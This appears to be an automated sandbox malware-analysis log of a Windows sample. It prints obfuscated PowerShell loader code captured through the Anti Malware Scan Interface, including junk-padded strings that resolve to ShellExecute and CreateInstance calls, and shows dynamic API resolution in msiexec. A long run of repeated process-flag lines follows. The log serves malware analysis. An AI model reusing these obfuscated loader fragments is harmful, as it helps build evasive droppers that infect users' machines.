Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnKuvkQuan AuiCoanMelg ereThenHul=Skr(Opd$FriT C mFustOm e.un B.n- HaoRedrUpr Off$HosWkbeaRe rBasbBjelC,eeC rl Vii C,kAfse vr).rv ')Fusionsdokumentet (Drunkometer ' nt$Ro g TalSikoSpnbUn a etlPa : scLDisipirmtopbb si BreFles,trt K = aa$LyseSmunZonvGr :U fuHa,sBeee Rer Cop dgrS so Scf ,oit,rl Rue ff ')if($Blodsnkningen){ $Chemotherapeutics93=[char]34+$Udfrt+[char]34Fusionsdokumentet (Drunkometer ' ek$Ov.gTaklC toFrebLovaHjelEle:Brer Ada ComBrohFu.eChaaAktdSp,=cos[ GeTT.nyAfspSo,eF s]Men: re:RutGpeneBo,tdroTMagyTe.pDybe.anFungr.phoKo.mS rCUniLSubS CaIDioDP c(God$PosU inR,sbNonlCoriRevgkn.h S tScreDisdB.rlH ly ev)Reg ')Fusionsdokumentet (Drunkometer ' eg$ S,gAcclTa o Opb GoaRivlGlo:Es D Tei,yms ,ot FiaMarn Rec yneP,srirriEasnTidg at1dam8Or 1Ink=Stv[C rS Fay LbsSpatHvdeKlnm Vo.IndAef.cRt.tKooi UlvUmbaHistAr o S rTyn]Ana:Fis:He C A.rMure T a Pit .neOccISl.nUnesHestC,laF,rnCn cDene b(Har$SparSala,namMidhLameSe aMaxdRec)Eks ')Fusionsdokumentet (Drunkometer ' De$De.gAu.lF lo prb UdaPrjlBel:F rSTant beoS nrmalcHediasirMi.kRepl B esp rnykn obe ros ci Co= u J $b bD Bei VisPastPhoaCorn Sac leNumrspiiHennRifg od1 Re8Kor1.en. nI ott oseI,fmO d( R )sim ')if (!$Storcirklernes) {$Storcirklernes = $Distancering181.Item(0)}Fusionsdokumentet (Drunkometer 'Ser$De StoltBreo nvrAf.c k.i,nbrDick M,lGreeDedrCornMileMo sMon. nDBruoU scM ru om Wie ytnU,stBas.OmlATr p repSldlC riO dc waaJantStoiHaeoCycnFla. BaSTyphCore SylR.vlFalERepxTriePrac oiuDistOpteSup(Tra$ ReW BaaOx lTu lRnteOmrr Of,Kun$SteCButh eceAllmPr.oMu tXa.h cef rrP saChapStveOveu G tColi U.csuksSlg9Bog3Vgg, Ja$,lyL itiSh mNurb.ami neeBomsToutSku,Cou$K,nn euExalPomlDis,Le 0kic)Kla ')Fusionsdokumentet $ledelsesfunktionen}function Ulfhild ($Flagellationernes,$Hessian) {#Terminational Torskegilderne Bregnerod Omrystningers Folkekongresser Sanitrt topforhandlingerne Gteskabsbruddet Studieegnet Outquery Fusionsdokumentet (Drunkometer 'Sup$ResFKl.l raLeigMaleLiml ekl praskutSkdiTvaoNeunud e CorPrvn Anemons ik ol-PerbSttxNonoSter Re Unp$SluHHileUnesTopsUljiTaiaRugnBer ')#immunoelectrophoresis Kunstskjtelb Baadsmandspibens cerebropsychosis mastoiditis Preadornment Ozons Revibrational Unsweetness Murrain Alilonghi Underburned Vejvsenets Blokaders Bipods Computerbranchens Firevortex Garderobenumrene Vikledes Apokalypsens Saudiere Faktoranalyse Nonimmigration Birching Penalizes Regressions Turbinelike }#Jagttilladelserne Almswomen Sporingsstationens Bialis Optagelseskriteriets Sternway Driftsforstyrrelsers Dirigerende Lseplaners Amphistomatic Hjemfarnes Danmarksbilledernes Blresmlden Skambid Pensionrs Kriminalkommissrers Afgangsperrons Bararite afstemningsformen Semisevere Unevasively Brofogden Marselisborg flled marskernes lgmnds Function Meningsbaerende ($Sickishly, $Ufornuftigst = 0){$Whippable=2Fusionsdokumentet (Drunkometer 'udd$.rug SplW.so ,sbStyaM.tlalt:TraB Syu yrk ove ImtBoyrcogoIsts SaeEx Pr=K,e P eNTh.eAccwB.o-ArnOSagb V.jPleeRescPh,t An DobFasy.odtMeleReh[Ca ]lte .i(Smu$UnhSBezi DecReakC.li
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnKuvkQuan AuiCoanMelg ereThenHul=Skr(Opd$FriT C mFustOm e.un B.n- HaoRedrUpr Off$HosWkbeaRe rBasbBjelC,eeC rl Vii C,kAfse vr).rv ')Fusionsdokumentet (Drunkometer ' nt$Ro g TalSikoSpnbUn a etlPa : scLDisipirmtopbb si BreFles,trt K = aa$LyseSmunZonvGr :U fuHa,sBeee Rer Cop dgrS so Scf ,oit,rl Rue ff ')if($Blodsnkningen){ $Chemotherapeutics93=[char]34+$Udfrt+[char]34Fusionsdokumentet (Drunkometer ' ek$Ov.gTaklC toFrebLovaHjelEle:Brer Ada ComBrohFu.eChaaAktdSp,=cos[ GeTT.nyAfspSo,eF s]Men: re:RutGpeneBo,tdroTMagyTe.pDybe.anFungr.phoKo.mS rCUniLSubS CaIDioDP c(God$PosU inR,sbNonlCoriRevgkn.h S tScreDisdB.rlH ly ev)Reg ')Fusionsdokumentet (Drunkometer ' eg$ S,gAcclTa o Opb GoaRivlGlo:Es D Tei,yms ,ot FiaMarn Rec yneP,srirriEasnTidg at1dam8Or 1Ink=Stv[C rS Fay LbsSpatHvdeKlnm Vo.IndAef.cRt.tKooi UlvUmbaHistAr o S rTyn]Ana:Fis:He C A.rMure T a Pit .neOccISl.nUnesHestC,laF,rnCn cDene b(Har$SparSala,namMidhLameSe aMaxdRec)Eks ')Fusionsdokumentet (Drunkometer ' De$De.gAu.lF lo prb UdaPrjlBel:F rSTant beoS nrmalcHediasirMi.kRepl B esp rnykn obe ros ci Co= u J $b bD Bei VisPastPhoaCorn Sac leNumrspiiHennRifg od1 Re8Kor1.en. nI ott oseI,fmO d( R )sim ')if (!$Storcirklernes) {$Storcirklernes = $Distancering181.Item(0)}Fusionsdokumentet (Drunkometer 'Ser$De StoltBreo nvrAf.c k.i,nbrDick M,lGreeDedrCornMileMo sMon. nDBruoU scM ru om Wie ytnU,stBas.OmlATr p repSldlC riO dc waaJantStoiHaeoCycnFla. BaSTyphCore SylR.vlFalERepxTriePrac oiuDistOpteSup(Tra$ ReW BaaOx lTu lRnteOmrr Of,Kun$SteCButh eceAllmPr.oMu tXa.h cef rrP saChapStveOveu G tColi U.csuksSlg9Bog3Vgg, Ja$,lyL itiSh mNurb.ami neeBomsToutSku,Cou$K,nn euExalPomlDis,Le 0kic)Kla ')Fusionsdokumentet $ledelsesfunktionen}function Ulfhild ($Flagellationernes,$Hessian) {#Terminational Torskegilderne Bregnerod Omrystningers Folkekongresser Sanitrt topforhandlingerne Gteskabsbruddet Studieegnet Outquery Fusionsdokumentet (Drunkometer 'Sup$ResFKl.l raLeigMaleLiml ekl praskutSkdiTvaoNeunud e CorPrvn Anemons ik ol-PerbSttxNonoSter Re Unp$SluHHileUnesTopsUljiTaiaRugnBer ')#immunoelectrophoresis Kunstskjtelb Baadsmandspibens cerebropsychosis mastoiditis Preadornment Ozons Revibrational Unsweetness Murrain Alilonghi Underburned Vejvsenets Blokaders Bipods Computerbranchens Firevortex Garderobenumrene Vikledes Apokalypsens Saudiere Faktoranalyse Nonimmigration Birching Penalizes Regressions Turbinelike }#Jagttilladelserne Almswomen Sporingsstationens Bialis Optagelseskriteriets Sternway Driftsforstyrrelsers Dirigerende Lseplaners Amphistomatic Hjemfarnes Danmarksbilledernes Blresmlden Skambid Pensionrs Kriminalkommissrers Afgangsperrons Bararite afstemningsformen Semisevere Unevasively Brofogden Marselisborg flled marskernes lgmnds Function Meningsbaerende ($Sickishly, $Ufornuftigst = 0){$Whippable=2Fusionsdokumentet (Drunkometer 'udd$.rug SplW.so ,sbStyaM.tlalt:TraB Syu yrk ove ImtBoyrcogoIsts SaeEx Pr=K,e P eNTh.eAccwB.o-ArnOSagb V.jPleeRescPh,t An DobFasy.odtMeleReh[Ca ]lte .i(Smu$UnhSBezi DecReakC.li
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
